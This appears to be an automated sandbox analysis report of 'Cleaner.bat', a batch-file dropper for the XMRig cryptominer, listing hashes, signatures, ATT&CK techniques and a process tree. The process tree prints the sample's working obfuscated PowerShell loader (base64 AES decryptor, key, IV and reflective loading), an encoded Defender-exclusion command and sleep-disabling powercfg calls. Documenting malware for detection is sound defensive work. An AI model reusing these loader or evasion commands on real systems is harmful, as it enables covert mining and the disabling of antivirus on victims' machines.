Analysis

  • max time kernel
    299s
  • max time network
    299s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    17-05-2022 11:55

General

  • Target

    Cleaner.bat

  • Size

    3.1MB

  • MD5

    b0f63b3801d950a3ce8f27d08d4b413a

  • SHA1

    5445683bc8c1bdc716ae84cd59dea91ae814dd19

  • SHA256

    0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233

  • SHA512

    051f9fcba315db5f9cc0dec07c1736f984ef94151b92e7ecc3c6823529f4e55270ff44bd08416a77a9f0eb8c732b679ff0500932d309ab51e645b4db909cfc43

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 5 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4772
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F"
      2⤵
        PID:4104
      • C:\Windows\system32\xcopy.exe
        xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe" /y
        2⤵
          PID:4456
        • C:\Windows\system32\attrib.exe
          attrib +s +h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
          2⤵
          • Views/modifies file attributes
          PID:4256
        • C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
          Cleaner.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $cpGMmW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Cleaner.bat').Split([Environment]::NewLine);$vKMTac = $cpGMmW[$cpGMmW.Length - 1];$qUeblb = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgZHlIZHhWIHsgcHVibGljIHN0YXRpYyBieXRlW10gSHVTTFdiKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gRndaYVdtKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $qUeblb;[System.Reflection.Assembly]::Load([dyHdxV]::FwZaWm([dyHdxV]::HuSLWb([System.Convert]::FromBase64String($vKMTac), [System.Convert]::FromBase64String('GpALIgw8Bm2Ku/F1LxriAEFFGLwksa0vKKHsogEGbsM='), [System.Convert]::FromBase64String('0GcmDM5eLt1yF271xja3FQ==')))).EntryPoint.Invoke($null, (, [string[]] ('')))
          2⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:464
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eoertx50\eoertx50.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3968
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79A9.tmp" "c:\Users\Admin\AppData\Local\Temp\eoertx50\CSC4D3920BC13A4F43B530ADF28245F9B7.TMP"
              4⤵
                PID:3184
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBtAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB0AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwB2AHYAIwA+AA=="
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2640
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "PAAjAGgAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBtAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB0AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwB2AHYAIwA+AA=="
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2892
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3080
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3088
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2084
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4624
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2960
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe drfqmlnvpiibl0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB03TtmEydM3r45suIY99yeGKcgftsrBdvESbWdMi9i5bh/zfUW1ZnMLjHBbKDBGataHhw5nUQaadFedAE2keeYjFKWbK63MMcASoK60oarJE9p2cZy7dv70xlvjcFV3UfsEKGaJ8YMhSmRpiGOQYVFoLlCGZcgJ5df+2UdkVZFNIvmccTm+eWRge0ifCU1/QsI7VfaHoqUeGh5IRdOCxK3q/TB4YImGLfUtg6zm2I4XFpLJoqtkvUS/fwcQghskc7n25tTyLCS8EbA1uAteSqct4iqp3Vcb4wsNMwd7oew1y7tUJ3DOBrUjZCmY4ChoJ6I0ubqs1vK+LRzp2AzP+tq28KECYUjo8e7Nxp05q9nKLqlt5vdV8UIWehUMqdRENxWy/4aVDSJG8N4p6jKo5P1dYhg5klABQMncQkEqc+txV4ZPjh8mmoNKlA8+eaxgpdMEJ1APQpWIgT1fuX4CEsLJ0vjmiB4ebFJ8YQG5N7e2BGrcnOgvdJn5R20eOulwngomzxy5IOt9GHOio0XSCt/AKNVe+ak6mWfgD6gxt5ttS5d5B3iArlsdF7+ru+nmqHJgDnrkPHz5lhGozZ0uaIKLmJuDvCufApec68ZXc2h9PCjf8IbMcb3lLsPrUZFSxjjxj1XrXdnlcD/McNf4BrYvrkHlYxQOtopXitywvVCUkH/6jC/SwpjBHGXm3vqMnwI3ao81zNdKiYDpTKc7tH8T3FpvUNtQxRaZNdlmkQkJPM3JR26WrrrcCVoJqWks29+Q2IJJrOUABT0kG3cYarl3QPHeOd2O+JLihY6pJz/iLUDnpNLe6sRSLN8NUeWu/OtQVIOvpY+PB6EhqWu4HvGzS94MW8utZiK9j4DgauMvGJn3qIlI6ruE+I2IgKS5peujSHc79QNX9P0nYd56QXR3r4bGswx6SuaMv1g18/m3T4Ib3pUApEj5V5yJ7RU9WtXT9w1BmJFFy/aDZiOIzO5h1NebJnw31/OhtEWbPaLVLOiqw5u+dUBAxNLTGV/mFpUYN6aEJjsvWjgb/sbOc3ZQDTnIBMzWyO1i4bHuJYfxGqs157IbFKVMFjCImutzY2sOQw7fOTM1ezXB8IuK2QFbPQbEwfN+lhFP+A02r2NPCS5CgVsmKSTyowkfKCxFrK8ov75bzU1cQFqWcJx9jom37vR+8yZqGDmw6PWENXuqCp7kp2jOD3Fj4bp5GqCjfQUWG11pjnhOPmXXVCD2RnCLSFGmNgwDbbmc42O6OebDBtOzXe+i6ondZ86+QLge7bRnt7mybBNXqI4pmdmr9giWAKBLeZVsqg558KVKae+il88GowgwD9Zie8843TniOg8DaN+XpXMAU9iNPIZQWO2iT8/0as27YNxjcneJbhifGuRwD+c756fTkWwwvC+lAYrDesYrwt7o4LpUGsTPhfYhi+gMwweoUmHiZ8tLe1xbjgSu3AqYPxrhHcxdUy0TjvQ==
              3⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1856
          • C:\Windows\system32\attrib.exe
            attrib -s -h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
            2⤵
            • Views/modifies file attributes
            PID:4600
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 4772 -s 292
            2⤵
            • Program crash
            PID:5092
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 452 -p 4772 -ip 4772
          1⤵
            PID:2312

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Hidden Files and Directories

          2
          T1158

          Registry Run Keys / Startup Folder

          1
          T1060

          Defense Evasion

          Hidden Files and Directories

          2
          T1158

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Command and Control

          Web Service

          1
          T1102

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            0a2167be494f34b1748bf497ce76bf5f

            SHA1

            16051a2a148c0d7dfe72afecd1fa62ee094f4699

            SHA256

            cde0160f520ac8ec65123bb3bee0503c19e85cb38db95c81a3aef7402e7b746d

            SHA512

            74e127d633b3bad18bef0cf84fd2a42b321d9044000f43e9565c2bd65f79cb5e8804943fe1099d1b93e1207010dd9466544221ed3404922fd611ec1ce0b8bff7

          • C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Admin\AppData\Local\Temp\RES79A9.tmp
            Filesize

            1KB

            MD5

            799712526bf7fe16108483f2b821955b

            SHA1

            2488ba47142525caf78d1998f73aa0fdbb49f37f

            SHA256

            f392f8949bd9e3b008db96c5ed6c75592e9ad5c67130ab8b24eace1ccb230e6e

            SHA512

            013e520a0a9429d62638a594c5c949ab60ba6c91557a1f92d3357ae38f76b34a2ee8e3e3bd379e9199f7e2d48b21d62814a31e6daf1584424b61a4db69a88be0

          • C:\Users\Admin\AppData\Local\Temp\eoertx50\eoertx50.dll
            Filesize

            3KB

            MD5

            d9cb4a51262597d34337fe9d2cd56ddb

            SHA1

            c6387d18a40ed680c20f63cc3cb485aa6a49fd04

            SHA256

            730f2c681f43d3aa9fe622d37e13b9638540e25eff6a79ea25bd6c3efae7236a

            SHA512

            863c1af29be162efe894a3ab00050ed4936c2f821dd5757ce3b5f1dc8554324ce81fc60ff2cc0056d0da712e031ac2db7aba88feb82aa78407aacd93ba600549

          • \??\c:\Users\Admin\AppData\Local\Temp\eoertx50\CSC4D3920BC13A4F43B530ADF28245F9B7.TMP
            Filesize

            652B

            MD5

            f1cae20bb35e526b0d568b481bcb844c

            SHA1

            5e460b7c91d7f5354e9f1ceaa24b855a3cd35cbc

            SHA256

            466d075edc83f3c9dcc150a75fc52e2ed8ba77ff5806fa28c219313593b6f5e7

            SHA512

            696e91435a968efe12d536ae7d443d89e91c0c1507ec8635f21a91c59e8dbfdadd4763b92bac7525d1350668b2972f2cd2c5f05ba87cb9529f6b39b7a5f4c6ae

          • \??\c:\Users\Admin\AppData\Local\Temp\eoertx50\eoertx50.0.cs
            Filesize

            744B

            MD5

            7ba109a6ade3811040a994c47678a924

            SHA1

            852d06b7e9d96fcd7ed0de7dca03882044d6684a

            SHA256

            82b5ccd87e34e64a00145fe3a7baaeb2fec10213583a32cf7a0327516fe960e3

            SHA512

            f81a5f1899594ab262ee4f57b3f4af58ed991d7db9bc48ec1397f9caa966f53e660e4e35fc0bfadc55ca13850b3727a2fab68ef42d445cd96ee290cfc11f4971

          • \??\c:\Users\Admin\AppData\Local\Temp\eoertx50\eoertx50.cmdline
            Filesize

            369B

            MD5

            3d860d06221702e57d40d6fef99b4070

            SHA1

            f360e30a9d13eb0319171707775635c45792a7eb

            SHA256

            a6a42ff48e158f02df5f5f8774f007843610370d1a57fd2f9b224089e082fd78

            SHA512

            8926d591d19480b9e3b589a93355b9ad96e4f38ff59b2de27b24dd974c8170afddfaaae6436d51cedf4fa06f1e16ddd20638c9d143000431129bc7be178dd769

          • memory/464-145-0x000001A6CA970000-0x000001A6CA982000-memory.dmp
            Filesize

            72KB

          • memory/464-134-0x0000000000000000-mapping.dmp
          • memory/464-136-0x000001A6CA680000-0x000001A6CA6A2000-memory.dmp
            Filesize

            136KB

          • memory/464-137-0x00007FF895F10000-0x00007FF8969D1000-memory.dmp
            Filesize

            10.8MB

          • memory/1856-157-0x0000000140000000-0x0000000140803000-memory.dmp
            Filesize

            8.0MB

          • memory/1856-154-0x0000000140000000-0x0000000140803000-memory.dmp
            Filesize

            8.0MB

          • memory/1856-165-0x0000016686370000-0x0000016686390000-memory.dmp
            Filesize

            128KB

          • memory/1856-164-0x00000165F37B0000-0x00000165F37D0000-memory.dmp
            Filesize

            128KB

          • memory/1856-163-0x00000165F37B0000-0x00000165F37D0000-memory.dmp
            Filesize

            128KB

          • memory/1856-161-0x00000165F3730000-0x00000165F3770000-memory.dmp
            Filesize

            256KB

          • memory/1856-160-0x0000000140000000-0x0000000140803000-memory.dmp
            Filesize

            8.0MB

          • memory/1856-159-0x00000165F1C60000-0x00000165F1C80000-memory.dmp
            Filesize

            128KB

          • memory/1856-158-0x0000000140000000-0x0000000140803000-memory.dmp
            Filesize

            8.0MB

          • memory/1856-155-0x000000014036DB84-mapping.dmp
          • memory/2084-151-0x0000000000000000-mapping.dmp
          • memory/2640-146-0x0000000000000000-mapping.dmp
          • memory/2892-148-0x00007FF895F10000-0x00007FF8969D1000-memory.dmp
            Filesize

            10.8MB

          • memory/2892-147-0x0000000000000000-mapping.dmp
          • memory/2960-153-0x0000000000000000-mapping.dmp
          • memory/3080-149-0x0000000000000000-mapping.dmp
          • memory/3088-150-0x0000000000000000-mapping.dmp
          • memory/3184-141-0x0000000000000000-mapping.dmp
          • memory/3968-138-0x0000000000000000-mapping.dmp
          • memory/4104-130-0x0000000000000000-mapping.dmp
          • memory/4256-132-0x0000000000000000-mapping.dmp
          • memory/4456-131-0x0000000000000000-mapping.dmp
          • memory/4600-162-0x0000000000000000-mapping.dmp
          • memory/4624-152-0x0000000000000000-mapping.dmp